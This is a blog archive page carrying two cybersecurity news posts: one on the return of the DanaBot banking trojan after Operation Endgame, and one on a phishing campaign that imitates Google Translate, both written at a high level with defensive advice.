Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Malicious Mails. Show all posts
Malwares
Cyber Attacks CyberCrime DanaBot Malicious Backdoor Malicious Mails Malware attacks Malwares

DanaBot Malware Resurfaces With New Variant After Operation Endgame Disruption

 

Despite a coordinated international takedown earlier this year, the DanaBot malware has returned with a newly upgraded version, signaling yet another resurgence of a threat that has repeatedly evaded permanent shutdown. The fresh discovery comes roughly six months after law enforcement agencies crippled the malware’s network during Operation Endgame, a global effort that announced infrastructure seizures and criminal indictments in May. Researchers at Zscaler ThreatLabz now report that DanaBot is once again circulating in attacks, with a rebuilt architecture designed for persistence and continued financial gain. 

The latest version, identified as DanaBot 669, introduces a command-and-control system based on Tor hidden services and “backconnect” nodes. By routing malicious communication through .onion domains, the operators create a layer of anonymity that makes tracking and disruption significantly more difficult. Zscaler’s analysis also uncovered several active cryptocurrency wallet addresses linked to the campaign, spanning Bitcoin, Ethereum, Litecoin, and TRON, which the attackers are using to collect stolen funds from victims. 

DanaBot first emerged several years ago when researchers at Proofpoint revealed it as a Delphi-written banking trojan delivered largely through phishing emails and malvertising lures. Its creators adopted a malware-as-a-service model, renting out access to cybercriminal groups who used it to harvest credentials from online banking sessions. Over time, the malware evolved into a modular system capable of functioning as both an information stealer and a loader, extracting stored browser data — including crypto wallet details — and enabling follow-on payloads such as ransomware. 

Although Operation Endgame temporarily slowed activity, it did not eliminate the malware’s core operators. Threat actors simply paused long enough to rebuild infrastructure and adapt their tactics. During this downtime, many initial access brokers shifted toward other malware families, but the financial motivation behind DanaBot ensured its eventual revival. Its steady reappearance in campaigns since 2021 has shown that as long as cybercrime remains profitable, disruptions are rarely permanent.

Zscaler warns that current DanaBot campaigns employ familiar distribution methods. Malicious email attachments and links continue to be the main infection route, while SEO poisoning and deceptive online advertisements also lure victims into executing the malware. Some infections have been linked to wider incidents involving ransomware deployments, demonstrating the tool’s ongoing role in larger criminal ecosystems. 

Organizations can reduce exposure by updating security tools and blocking newly published indicators of compromise from Zscaler’s latest intelligence. The return of DanaBot highlights a recurring cybersecurity reality: even major law enforcement actions cannot fully dismantle financially driven malware operations when key actors remain at large.
Read more »
User Security
Cyber Attacks Malicious Mails Phishing Attacks Spoofing User Security

Hackers Mimic Google Translate to Launch Phishing Attacks

 

Threat analysts at Avanan, a Check Point Software firm, have unearthed a novel phishing campaign mimicking Google Translate in order to lure users. 

The hackers are employing the coding methodology to obfuscate phishing sites and make them look authentic to the victim as well as bypass security gateways. Threat actors also use social engineering techniques to convince users they need to respond immediately to an email or lose access to unread messages permanently. 

Subsequently, the victims are requested to click on a link incorporated in the email itself. Upon clicking on the link, the users are directed to an info stealer page that seems to be an authentic Google Translate page, with a pre-filled email field that requires only to fill login credentials. 

According to a blog post published last week, this is the standard modus operandi employed by hackers as it creates a sense of urgency and forces victims to act irrationally and recklessly by clicking on a malicious link or downloading a malicious attachment. Behind the scenes, the hackers are also employing a lot of JavaScript, including the Unescape command, to hide their true intentions. 

Unescape is a function in JavaScript that computes a new string as a single parameter and utilizes it to decode the string encoded by the escape function. The hexadecimal sequence in the string is replaced by the characters they represent when decoded through unescaped command. 

“This attack has a little bit of everything. It has unique social engineering at the front end. It leverages a legitimate site to help get into the inbox. It uses trickery and obfuscation to confuse security services,” Jeremy Fuchs, an Avanan cybersecurity threat analyst stated. 

To guard against these attacks, users need to be extra vigilant. The researchers recommended users scan the URLs found in messages before clicking on them to ensure the destination is legitimate.

Moreover, users can check the authenticity of emails by paying closer attention to grammar, spelling, and factual inconsistencies within an email. If the users are suspicious regarding where they're coming from or their intentions, they should just ask the original sender to be sure before taking further action.
Read more »
Subscribe to: Comments (Atom)